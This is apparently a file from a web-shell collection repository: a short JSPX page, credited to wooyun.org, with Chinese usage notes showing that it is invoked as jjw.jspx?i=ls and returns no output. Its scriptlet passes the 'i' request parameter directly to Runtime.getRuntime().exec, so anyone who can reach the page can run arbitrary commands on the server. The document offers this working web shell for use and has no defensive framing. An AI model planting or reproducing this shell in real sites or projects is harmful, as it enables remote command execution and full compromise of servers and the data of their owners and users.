webshell/jspx/jjw.jspx
tennc 6c708c5f1a Create jjw.jspx
from wooyun.org
使用说明:http://xx.xx.xx/jjw.jspx?i=ls
无回显
2015-05-18 15:11:11 +08:00

6 lines
239 B
Text

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
<jsp:scriptlet>
Runtime.getRuntime().exec(request.getParameter("i"));
</jsp:scriptlet>
</jsp:root>